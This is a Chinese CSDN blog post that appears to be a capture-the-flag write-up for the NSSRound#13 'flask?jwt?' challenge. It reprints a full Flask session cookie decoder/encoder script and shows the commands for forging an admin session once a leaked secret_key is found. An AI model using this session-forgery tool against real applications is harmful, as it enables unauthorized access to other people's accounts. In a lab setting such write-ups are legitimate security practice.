[NSSRound#13 Basic]flask?jwt?

最新推荐文章于 2024-07-30 17:23:09 发布
最新推荐文章于 2024-07-30 17:23:09 发布
阅读量223 收藏
点赞数 1
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80552914/article/details/136765543
版权

session伪造:

写一个名为:flask_session_cookie_manager3.py的python文件

import sys
import zlib
from itsdangerous import base64_decode
import ast
 
# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3:  # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else:  # > 3.4
    from abc import ABC, abstractmethod
 
# Lib for argument parsing
import argparse
 
# external Imports
from flask.sessions import SecureCookieSessionInterface
 
 
class MockApp(object):
 
    def __init__(self, secret_key):
        self.secret_key = secret_key
 
 
if sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
 
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
 
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
 
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value
 
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
 
                    data = payload.split(".")[0]
 
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
 
                    return data
                else:
                    app = MockApp(secret_key)
 
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
 
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else:  # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
 
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
 
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
 
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value
 
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
 
                    data = payload.split(".")[0]
 
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
 
                    return data
                else:
                    app = MockApp(secret_key)
 
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
 
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
 
if __name__ == "__main__":
    # Args are only relevant for __main__ usage
 
    ## Description for help
    parser = argparse.ArgumentParser(
        description='Flask Session Cookie Decoder/Encoder',
        epilog="Author : Wilson Sumanang, Alexandre ZANNI")
 
    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
 
    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                               help='Session cookie structure', required=True)
 
    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                               help='Session cookie value', required=True)
 
    ## get args
    args = parser.parse_args()
 
    ## find the option chosen
    if (args.subcommand == 'encode'):
        if (args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif (args.subcommand == 'decode'):
        if (args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value, args.secret_key))
        elif (args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

解密:python flask_session_cookie_manager3.py decode -s “secret_key” -c “需要解密的session值”

加密:python flask_session_cookie_manager3.py encode -s “secret_key” -t “需要加密的session值”

在忘记密码页面源码有一个hint就是secret_key

带人改session即可

cyxalmm
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白个人向[NSSRound#13 Basic]flask?jwt?
2303_77183794的博客
06-30 405
修改”和‘,给true首字母大写,给一些地方加上空格不然脚本会报错。成功之后,点击“拿flag”,然后替换cookie。显然是没用的功能,但是还是设计出来了,可能有提示。百度关键词 flask jwt cookie。百度关键词 flask jwt cookie。修改id为“1”,这里需要修改符号和一下细节。和我们的推断一致,盲猜第一个就是admin。获取cookie解密(注意下图的用户)拿到cookie,去替换(成功如下图)
[NSSRound#13 Basic]flask?jwt?解题思路&过程
iamblackcat's blog
07-09 1284
[NSSRound#13 Basic]flask?jwt?解题思路&过程
[NSSRound#13 Basic] 刷题记录
rev1ve的博客
10-21 500
我们尝试随便修改下刚刚的session值,发现报错信息有key。那么我们随便注册一个登陆进去,想拿flag发现不是admin。回到拿flag处,bp抓包修改session值,得到flag。发现只能读出来数字,那么可以使用od命令,把它转换成八进制。发现不是admin,回到刚刚拿flag界面,发现有hint。依次找到,那么我们就可以跟着文章来,进行HTTP走私。打开题目,想注册admin发现不行(暗示很明显了)得到加密后字符串,回到拿flag页面bp抓包。提示了flag在根目录,我们尝试直接读取。
[NSSCTF Round #13]web专项赛wp
Leaf_initial的博客
07-05 1080
属性,所以猜测这个时间是从session中读取,随意修改session查看报错,可以在这查到。我们自然是没有账号密码的,这里一开始尝试sql注入但是提示账号密码错误,所以换个思路。Ctrl+F以下,查找那三个模块,显示已经开始,那就可以开始按照文章来打,进行。了,那就去尝试session伪造,我们先得到现在的session。是一个超链接,点击之后跳转界面,根据题目描述,得知这里使用了。后的界面,把伪造好的session放进去,得到flag。先用dirsearch扫一下,ok,啥也没有,换个思路。
[NSSRound#13 Basic]flask?jwt?(hard)
2301_80552914的博客
03-16 241
随意修改session查看报错,可以在这查到。进行cookie解密。
flask-jwtlogin:flask扩展以处理API中的用户登录
05-02
Flask-jwtlogin快速入门 flask-jwtlogin是轻量级的flask扩展,用于处理REST API中的用户它为您提供什么: jwt_required装饰器检查当前请求中是否存在jwt generate_jwt func获取加密了用户标识符的令牌 load_user...
flask-jwt
03-16
`Flask-JWT`是基于Python的微型Web框架`Flask`的一个扩展,用于实现JSON Web Token(JWT)的身份验证。JWT是一种轻量级的安全机制,常用于在客户端和服务器之间传输认证信息,例如在API中进行身份验证。在本文中,...
flask-jwt-extended:提供JWT支持的开源Flask扩展(包括电池)!
02-05
Flask-JWT-扩展产品特点Flask-JWT-Extended不仅在Flask中增加了对使用JSON Web令牌(JWT)的支持以保护视图,而且还内置了许多有用的(和可选的)功能,这些功能使使用JSON Web令牌更容易。 这些包括: 支持将自定义...
flask-jwt-router:Flask JWT Router是一个Python库,可向Flask应用添加授权的路由
02-05
Flask JWT路由器 Flask JWT Router是一个Python库,可将授权路由添加到Flask应用。 基本和Google的OAuth2.0身份验证均受支持。 支持Google的OAuth2.0 Google OAuth 2.0快速入门 在此处阅读详细说明: oauth_...
flask-jwt-auth-test:Flask-JWT测试项目
05-04
在本文中,我们将深入探讨基于Python的Web应用框架Flask以及如何使用JWT(JSON Web Tokens)进行身份验证。"flask-jwt-auth-test"是一个针对Flask应用的测试项目,旨在展示如何集成JWT来实现安全的身份验证机制。 ...
Flask中的JWT
weixin_45439324的博客
12-03 6755
Flask中的JWT JWT认证 Json Web Token(JWT) JSON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在两个组织之间传递安全可靠的信息。 JWT是一个有着简单的统一表达形式的字符串: 头部(Header) 头部用于描述关于该JWT的最基本的信息,例如其类型以及签名所用的算法等。 JSON内容要经Base64 编码生成字符串成为Head...
flaskjwt的使用
weixin_43262264的博客
09-16 4096
之前用的Flask-JWT,感觉不好用,不太灵活,参考Flask-JWT源码直接用jwt库,就方便很多了,python3.7代码封装如下: # decorator.py import jwt from datetime import datetime from functools import wraps from werkzeug.local import LocalProxy from flask import request, jsonify, _request_ctx_stack, current_
LiteLLM
编码时光
07-25 1050
一、关于 LiteLLM🚅 企业级 我们为什么要建造这个? 二、用法 异步 流 日志可观测性 三、OpenAI代理 📖代理端点 快速启动代理-CLI 第1步:启动litellm代理 第2步:向代理发出ChatCompletions请求 代理密钥管理 请求 预期反应 四、支持的 Providers 五、贡献
基于flask的天气数据可视化系统1.0
lyccomcn的博客
07-25 272
Flask是一个基于Python的Web开发框架,它以灵活、微框架著称,基于werkzeug的轻量级web框架,可提高web应用的开发效率。首先,需要实例化一个Flask对象,然后设置一个路由,路由就是处理url到Python函数之间关系的程序,在Flask框架中通过@app.route装饰器来表示。也就是说,客户端将请求发送给web服务器,web服务器再将请求发送给Flask程序示例,程序示例需要知道每个url请求要运行哪些代码,所以需要建立一个url到python函数的映射。
【Python】pandas:排序、重复值、缺省值处理、合并、分组
最新发布
yannan20190313的博客
07-30 863
【Python】pandas:排序(sort_index,sort_values,nsmallest,nlargest)、重复值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 1003
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1100
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
Chapter 18 Python异常
2302_80253507的博客
07-28 1235
在Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
Flask-JWT-Extended如何使用本地的pem密钥?
06-10
from flask_jwt_extended import JWTManager app = Flask(__name__) app.config['JWT_PRIVATE_KEY'] = '/path/to/private_key.pem' jwt = JWTManager(app) # rest of your Flask app code ``` 确保将`/path/to/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值